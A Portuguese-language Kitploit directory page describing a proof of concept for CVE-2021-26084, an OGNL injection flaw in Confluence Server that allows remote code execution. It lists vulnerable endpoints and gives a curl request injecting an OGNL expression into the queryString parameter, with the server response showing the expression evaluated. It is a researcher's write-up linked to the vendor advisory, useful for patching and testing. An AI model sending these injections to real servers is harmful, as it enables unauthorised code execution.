Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/alt3kx/cve-2021-26084_poc
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

Exploit de prova de conceito para CVE-2021-26084, uma vulnerabilidade de injeção OGNL no Confluence Server e Data Center, demonstrando execução remota de código sem autenticação.

Ver Repositório
531648há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-26084 (PoC) | Injeção OGNL no Confluence Server Webwork

Existe uma vulnerabilidade de injeção OGNL que permitiria a um usuário autenticado, e em alguns casos a um usuário não autenticado, executar código arbitrário em uma instância do Confluence Server ou Data Center.

poc

Minha luta para localizar os pontos de entrada e injeções XD

Luta (1)Luta (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium
2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

Finalmente, pontos de entrada do Confluence explorados

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

Minha primeira inspeção manual: Nota: Usuário pré-autenticado

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Resposta do Servidor: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

Referências:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Excelente artigo publicado aqui:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Algumas dicas muito úteis de:
@wvuuuuuuuuuuuuu
@iamnoooob

Autor

Alex Hernandez aka (@_alt3kx_)

Baixar ferramenta